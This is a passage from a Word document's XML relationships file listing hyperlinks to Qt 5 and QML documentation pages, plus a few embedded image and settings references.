Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId2719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en/JavaScript/Reference/Reserved_Words" TargetMode="External"/><Relationship Id="rId800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dbuffer.html" TargetMode="External"/><Relationship Id="rId1223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-real.html" TargetMode="External"/><Relationship Id="rId1430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-vector4d.html" TargetMode="External"/><Relationship Id="rId1528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId2926" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-columnlayout.html" TargetMode="External"/><Relationship Id="rId1942" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId1802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-data.html" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-brightnesscontrast.html" TargetMode="External"/><Relationship Id="rId2064" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathview.html" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/modules-qml.html" TargetMode="External"/><Relationship Id="rId895" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-displace.html" TargetMode="External"/><Relationship Id="rId1080" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-mediaplayer.html" TargetMode="External"/><Relationship Id="rId2131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry.html" TargetMode="External"/><Relationship Id="rId2369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId2576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId2783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2990" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/videooverview.html" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-numberanimation.html" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-index.html" TargetMode="External"/><Relationship Id="rId755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-basekey.html" TargetMode="External"/><Relationship Id="rId962" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-graphicsinfo.html" TargetMode="External"/><Relationship Id="rId1178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-playlist.html" TargetMode="External"/><Relationship Id="rId1385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-togglebuttonstyle.html" TargetMode="External"/><Relationship Id="rId1592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-index.html" TargetMode="External"/><Relationship Id="rId2229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchorchanges.html" TargetMode="External"/><Relationship Id="rId2643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmodelindex.html" TargetMode="External"/><Relationship Id="rId2850" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickimageprovider.html" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathview.html" TargetMode="External"/><Relationship Id="rId615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qcoreapplication.html" TargetMode="External"/><Relationship Id="rId822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-checkboxstyle.html" TargetMode="External"/><Relationship Id="rId1038" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-layerfilter.html" TargetMode="External"/><Relationship Id="rId1245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-rotationsensor.html" TargetMode="External"/><Relationship Id="rId1452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginefullscreenrequest.html" TargetMode="External"/><Relationship Id="rId1897" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId2503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-springanimation.html" TargetMode="External"/><Relationship Id="rId2948" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId1105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-mousehandler.html" TargetMode="External"/><Relationship Id="rId1312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId1757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId1964" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-signalspy.html" TargetMode="External"/><Relationship Id="rId2710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-basics.html" TargetMode="External"/><Relationship Id="rId2808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickframebufferobject.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId1617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-performance.html" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/properties.html" TargetMode="External"/><Relationship Id="rId2086" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickimageprovider.html" TargetMode="External"/><Relationship Id="rId2293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId2598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-userinput.html" TargetMode="External"/><Relationship Id="rId2153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialtype.html" TargetMode="External"/><Relationship Id="rId2360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-row.html" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-string.html" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/configure-options.html" TargetMode="External"/><Relationship Id="rId777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-buttongroup.html" TargetMode="External"/><Relationship Id="rId984" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-horizontalpercentbarseries.html" TargetMode="External"/><Relationship Id="rId2013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-numberanimation.html" TargetMode="External"/><Relationship Id="rId2665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-cppplugins.html" TargetMode="External"/><Relationship Id="rId2872" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId844" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-compass.html" TargetMode="External"/><Relationship Id="rId1267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-scrollview.html" TargetMode="External"/><Relationship Id="rId1474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-abstracttextureimage.html" TargetMode="External"/><Relationship Id="rId911" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-enterkey.html" TargetMode="External"/><Relationship Id="rId1127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-opacitymask.html" TargetMode="External"/><Relationship Id="rId1334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-string.html" TargetMode="External"/><Relationship Id="rId1541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId1986" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId1401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-traceinputkey.html" TargetMode="External"/><Relationship Id="rId1639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1846" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId1706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1913" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-legacymodules.html" TargetMode="External"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId3019" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-qml-debugging-example.html" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-documents-structure.html" TargetMode="External"/><Relationship Id="rId799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dactiveinfo.html" TargetMode="External"/><Relationship Id="rId1191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-positioner.html" TargetMode="External"/><Relationship Id="rId2035" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2894" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcontext.html" TargetMode="External"/><Relationship Id="rId659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-performance.html" TargetMode="External"/><Relationship Id="rId866" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-custom3ditem.html" TargetMode="External"/><Relationship Id="rId1289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-slider.html" TargetMode="External"/><Relationship Id="rId1496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId2242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-localstorage-qmlmodule.html" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-topic.html" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId1051" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listelement.html" TargetMode="External"/><Relationship Id="rId1149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathcurve.html" TargetMode="External"/><Relationship Id="rId1356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-tapreading.html" TargetMode="External"/><Relationship Id="rId2102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId2754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2961" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-usecase-userinput.html" TargetMode="External"/><Relationship Id="rId726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animatedimage.html" TargetMode="External"/><Relationship Id="rId933" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-font.html" TargetMode="External"/><Relationship Id="rId1009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-itemgrabresult.html" TargetMode="External"/><Relationship Id="rId1563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId1868" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-gravity.html" TargetMode="External"/><Relationship Id="rId2407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry-coloredpoint2d.html" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ecma-international.org/publications/standards/Ecma-262.htm" TargetMode="External"/><Relationship Id="rId1216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-radiobutton.html" TargetMode="External"/><Relationship Id="rId1423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-variant.html" TargetMode="External"/><Relationship Id="rId1630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2919" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1935" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-signalspy.html" TargetMode="External"/><Relationship Id="rId2197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keys.html" TargetMode="External"/><Relationship Id="rId3010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-debugging.html" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmake-project-files.html" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlepainter.html" TargetMode="External"/><Relationship Id="rId790" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-cameraimageprocessing.html" TargetMode="External"/><Relationship Id="rId2057" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visualcanvas_overlap.png" TargetMode="External"/><Relationship Id="rId2264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlineedit.html" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId888" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-dialstyle.html" TargetMode="External"/><Relationship Id="rId1073" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-maptype.html" TargetMode="External"/><Relationship Id="rId1280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-shaderprogram.html" TargetMode="External"/><Relationship Id="rId2124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchorchanges.html" TargetMode="External"/><Relationship Id="rId2569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2983" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsensors-index.html" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-identifiedmodules.html" TargetMode="External"/><Relationship Id="rId748" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-backspacekey.html" TargetMode="External"/><Relationship Id="rId955" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-geoshape.html" TargetMode="External"/><Relationship Id="rId1140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particle.html" TargetMode="External"/><Relationship Id="rId1378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-thumbnailtoolbar.html" TargetMode="External"/><Relationship Id="rId1585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-cppextensionpoints.html" TargetMode="External"/><Relationship Id="rId1792" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 